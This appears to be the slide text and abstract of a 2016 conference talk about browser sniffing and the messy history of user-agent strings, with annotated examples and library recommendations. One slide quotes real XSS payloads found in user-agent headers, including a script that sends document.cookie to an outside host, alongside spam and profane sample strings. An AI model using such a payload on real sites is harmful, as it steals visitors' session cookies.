A presentation at code.talks 2016 in in Hamburg, Germany by Niels Leenheer
s e i l y d o b y er v e Niels Leenheer Niels Leenheer 30/09/2016
: g n i n war this talk is full of lies and deception
… s e y this talk is about browser sniffing
? y h w
browser sniffing is dirty
you should use feature detection
: s er op l e v e D b e W Dear d i p u t S s i g n i f f i n S er s Brow http://www.webstandards.org/2002/12/20/dear-web-developers-browser-sniffing-is-stupid/
y h W s on s a e 5R Br s k n i t S g n i f f i n S er ows https://www.sitepoint.com/why-browser-sniffing-stinks/
d a B s i on i t c e t e D er s Brow https://css-tricks.com/browser-detection-is-bad/
s e c i t c a r p t s e b responsive design progressive enhancement feature detection
n er tt a p i t n a browser sniffing
browser sniffing is just a tool
everybody uses browser sniffing
… t a h w is browser sniffing actually?
the http specification defines the user-agent header it contains a string with information about the browser
every request the browser makes to the server includes the user-agent header
GET http://whichbrowser.net/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: whichbrowser.net
GET http://whichbrowser.net/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: whichbrowser.net HTTP/1.1 200 OK Date: Mon, 08 Feb 2016 10:40:28 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT ETag: "984-50cae11796432" Accept-Ranges: bytes Content-Length: 2436 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 <!doctype html> <html>
you can access the exact same string using javascript
you can use the user-agent string to identify: the browser the rendering engine the operating system the device model and more
… t a h w is browser sniffing good for?
knowledge
if you know the platform or browser, you can streamline the user experience
if you know your users, you can build a better site for them
if you know which browser is being used, you can work around bugs
if you know which browser is causing errors, you can fix them
privacy implications
changing your user agent string actually makes it easier to track you
anonymity by looking like everybody else
brave does not have a useragent string of its own
… y h w is browser sniffing so difficult?
things started out simple
Mosaic Mosaic/0.9 The name of the browser The version of the browser
Netscape Navigator Mozilla/1.0 (Win3.1) The code name of the browser The version of the browser Operating system
but it quickly started to get complicated
Internet Explorer Mozilla/1.0 (compatible; MSIE 1.0; Windows 95) The name of the browser Compatible with Netscape Navigator 1.0 The version of the browser Operating system
Opera Opera/8.54 (Windows 95; U; en) The name of the browser The version of the browser Operating system English language United States level encryption
Opera Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0 Rendering engine
Opera Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.0 Version/10.00 The name of the browser Fake version of the browser Real version of the browser
Firefox Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1) Gecko/20090624 Firefox/3.5 The name of the rendering engine Build date of the rendering engine The name of the browser Version of the browser Version of the rendering engine
Firefox Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Build date is no longer updated
Firefox Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0
and it gets worse…
Safari Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3 The name of the browser Version of the browser
Chrome Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/525.28.3 The name of the browser Version of the browser
Opera Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180 The name of the browser Version of the browser
Internet Explorer Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Version of the browser
Edge Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162 The name of the browser Version of the browser
and those were all relatively normal user-agent strings
“User-Agent strings only get larger over time, never smaller” Niels’s law of User-Agent strings
sometimes browsers simply do not make sense at all
Samsung Internet Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/ 28.0.1500.94 Mobile Safari/537.36 Samsung device Version of the browser
Nokia Xpress for Windows Phone Mozilla/5.0 (Series40; NOKIALumia800; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.8.0.50.5
LG Netcast Mozilla/5.0 (X11; Linux; ko-KR) AppleWebKit/534.26+ (KHTML, like Gecko) Version/5.0 Safari/534.26+
sometimes browsers lie to hide their true identity
Opera Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 The name of the browser The name of the operating system Version of the browser
Opera Mobile (desktop mode) Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 The name of the browser ROT 13 encrypted “mobi“ Version of the browser
Internet Explorer Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) Browser version
Internet Explorer (compatibility view) Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) Trident 5 means it’s Internet Explorer 9
browsers can change the user-agent strings for individual websites
Mobile Internet Explorer 11 on Windows Phone 8.1 on html5test.com Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0; ARM; Touch; WPDesktop; Lumia 535)
Mobile Internet Explorer 11 on Windows Phone 8.1 Mozilla/5.0 (Mobile; Windows Phone 8.1; Android 4.0; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; Microsoft; Lumia 535) like iPhone OS 7_0_3 Mac OS X AppleWebKit/537 (KHTML, like Gecko) Mobile Safari/537
sometimes browsers are just weird
Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
Vehicle Center Console Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]
Mozilla/4.0 (MobilePhone PLS6600KJ/US/1.0) NetFront/3.1 MMP/2.0
Mozilla/4.08 (PDA; SL-C3000/1.0,Qtopia/1.5.2) NetFront/3.1
Mozilla/5.0 (DTV; TVwithVideoPlayer) NetFront/4.1 AQUOSBrowser/1.0 InettvBrowser/2.2 (08001F;DTV06VSFC;0009;0001)
Mozilla/5.0 (Standard; NF41SW/1.1; like Gecko; TASKalfa 406ci) NetFront/4.1
Mozilla/4.0 (PSP (PlayStation Portable); 2.60)
Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2
? Mozilla/5.0 (DAG; 1.4; like Gecko) NetFront/4.2
Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en] Opera Bork-edition?
BORK BORK BORK
and it is possible to change the user-agent string yourself
spam http://www.sexxlife.it/sexyshop (sexy shop - sexy toys, BDSM, vibratori, falli, vagine, lubrificanti, dvd porno, film hard, lingerie - Migliaia di articoli nel nostro sexy shop online.; http://www.sexxlife.it; info@sexxlife.it)
XSS attacks
<script>alert("My Little Pony”);</script> <script language="JavaScript">document.location= "http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;</script> <img src="http://bravo.trollab.org/mylittlepony.png" alt="My Little Pony”>XSS attacks
funny people (╯°□°)╯︵ ┻━┻ Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit) Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Surface Zune Phone XL) AppleWebKit/537.36 (KHTML, like Gecko)
funny people
angry people
angry people FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) FuckYou/123.0 FuckingFox/321.0 Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) Presto/2.10.229 Version/11.62 Seriously, Go fuck yourself W3C standards are important. Stop fucking obsessing over user-agent already.
4 x balls 82 x fuck 9 x dick 1.000.000 unique useragent strings 6 x ass 10 x shit 3 x vagina 108 x sex
user-agent strings cannot be trusted!
s e i l y d o b y er v e
er v e n d l ou h s you use browser sniffing for controlling access to your website
er v e n d l ou h s you use browser sniffing for determining browser capabilities
er v e n d l ou h s you build your own browser sniffing library
#1 use a browser sniffing library that is regularly updated
#2 check if it is possible to automatically schedule updates
try libraries like UAParser, PiwikDeviceDetector or WhichBrowser https://github.com/ua-parser https://github.com/piwik/device-detector https://github.com/whichbrowser
http://useragent.mkf.solutions https://github.com/ThaDafinser/UserAgentParserComparison
“If you tell a big enough lie and tell it frequently enough, it will be believed” — Ghandi
“If you tell a big enough lie and tell it frequently enough, it will be believed” — Ghandi
“If you tell a big enough lie and tell it frequently enough, it will be believed” — Adolf Hitler
thank you!
thank you!
This is talk about browser sniffing. And yes, I do realise it is 2016. I know browser sniffing is ugly and we should all be using feature detection. But a quick search on Github still shows millions of lines of code referring to user agents strings. So this message clearly hasn’t landed yet. But why is browser sniffing a bad choice? This talk will dive into history and show the origin of the user agent string and the hidden battle between browser makers and web developers. It will show its simple beginnings and the horrible monstrosity it has become.
